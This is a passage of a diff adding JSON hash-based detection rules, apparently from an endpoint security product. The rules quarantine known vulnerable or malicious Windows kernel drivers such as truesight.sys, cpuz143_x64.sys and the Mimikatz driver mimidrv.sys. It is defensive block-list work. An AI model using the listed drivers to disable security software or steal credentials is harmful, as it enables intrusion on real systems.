+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61bc437b-fa18-58cb-8d07-eb578321f533",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484183Z",
+ "creation_date": "2026-03-23T11:45:31.484209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f28506a8904778d8daf691670cb862b079df76b29f629a2cd8dae93f7628000d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61cbcc94-68df-55b5-8be5-9b2128626855",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145112Z",
+ "creation_date": "2026-03-23T11:45:32.145114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f9b5a2fe29c436a53d36d8a2084369ac6a8cd59b9eb01b3d3fa293f3487d3cc",
+ "comment": "Malicious Kernel Driver (aka driver_4f9b5a2f.sys) [https://www.loldrivers.io/drivers/b660d253-2b60-46c5-b95a-c354aa5eb154/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61d72c1c-f906-5f69-be0a-15e5e1795a20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478045Z",
+ "creation_date": "2026-03-23T11:45:30.478048Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478057Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bf4f8cb26ba38e54636864c744aac0839e7a1d6cb7b6cf13995e8ab19b9f7f8",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61dcb723-1a2b-5dbe-b768-98f0753383a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815746Z",
+ "creation_date": "2026-03-23T11:45:30.815748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5074f17c7cc4fdabec65b3b07132425ad0d9fefd993e896baba2f97f16277581",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61dedb8b-5824-5211-bc61-89dbb2003c33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810829Z",
+ "creation_date": "2026-03-23T11:45:31.810831Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d332fd20e74b55500b47007c46493d34c736d046f2d9fca002ec9dc16983775",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61e999a5-f582-5773-ac07-dce00ede1412",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146132Z",
+ "creation_date": "2026-03-23T11:45:31.146134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e96d64383a9ffc94a6c10abc77324e6e9b16b86757af21aa686e3c8aa3bb9190",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61f45de2-4287-50c6-b22a-0d54cdb428e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611711Z",
+ "creation_date": "2026-03-23T11:45:29.611713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d70bfea03deeea92a253f2b4a8b7181a3064f62c5207f94b5f7ce5a9e62ab4cf",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61fee31e-8a79-5d07-acf8-ff7aca4184f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824024Z",
+ "creation_date": "2026-03-23T11:45:30.824026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb1874b72bd6d05c9fbef698c45a6da126ae430433fe1c16dec8ef095379e6b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "620b583f-76cc-59c9-93ed-13258f0a02fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474152Z",
+ "creation_date": "2026-03-23T11:45:31.474156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f58a54da72384be4633924060d8553d6b1a46d62b64964939a61454fe277f287",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "620fcf68-3508-5af4-9de8-b357b6926d6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495188Z",
+ "creation_date": "2026-03-23T11:45:31.495190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d16dfca503373fddcc71e64f064cae1e2e9295bedaa345aa5388235478687b53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6219657a-a4c1-5614-a2c5-41da03de1284",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831830Z",
+ "creation_date": "2026-03-23T11:45:30.831832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20f0823320229b75f2f39f86e7499203ad06f3d52c03487ce7629c4b1a4819be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62218011-9d18-5d19-a93f-4e2d6c75c809",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465483Z",
+ "creation_date": "2026-03-23T11:45:30.465486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62248f3a-5ddb-5b43-a3dc-84304e6f2456",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830259Z",
+ "creation_date": "2026-03-23T11:45:30.830261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b55e7f88289ce8018bdda56e1445b2f72f18dc29a6d3ba8e88da6a7bf83468f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6224d19b-84a1-51c6-81bb-01a5e08c659a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815527Z",
+ "creation_date": "2026-03-23T11:45:31.815528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9c7959f399de15f1d8cc13e269ff773d6f73361c7ab1f056921acb20dd514fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6238d482-e9ea-5437-a858-e666d3f2e55e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481024Z",
+ "creation_date": "2026-03-23T11:45:30.481026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89bc3cb4522f9b0bf467a93a4123ef623c28244e25a9c34d4aae11f705d187e7",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "623e65ae-dd4b-5dbb-8a53-578c2ef43a08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970349Z",
+ "creation_date": "2026-03-23T11:45:29.970351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "624a845d-4fa4-50c8-b549-efee40e8def0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829067Z",
+ "creation_date": "2026-03-23T11:45:31.829071Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "966e8ab3a72e03b2be20ef9dae055a74a2b242603669115c6b8a33f01f273616",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6251c1c3-83b7-5d95-8d7b-898d2f4e3737",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817661Z",
+ "creation_date": "2026-03-23T11:45:31.817664Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "070596ced6796cbf129925caa24bf3fd9b6d28f029bab9fdb772f44a0dd94f5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62587e2d-1b27-52ce-bbc1-736d526b4644",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159176Z",
+ "creation_date": "2026-03-23T11:45:31.159178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a6f5a86311ba878bce8c0873b8bee0866e0eb1f9123c08fb528bd046c0daea9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "625b9626-014e-53bc-a9e3-3073a71a1339",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821527Z",
+ "creation_date": "2026-03-23T11:45:30.821530Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e642d82c5cde2bc40a204736b5b8d6578e8e2b893877ae0508cfa3371fc254dc",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "626043a4-b23a-5d27-8cbb-53c6f107cc29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147604Z",
+ "creation_date": "2026-03-23T11:45:31.147606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84ff6cc24ef5d3b6ec34f60122b1a007e69c7ab8b1de225c95e2ee96ef3ba33c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62608842-7df0-5f8b-b786-92d62e8a147e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479296Z",
+ "creation_date": "2026-03-23T11:45:30.479298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f020137cb08f86c48810780209a3f4a1fac361ed089ade61c1b5d6c64ded7872",
+ "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "62700c3b-224a-51d8-8e3e-1a870216fb0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
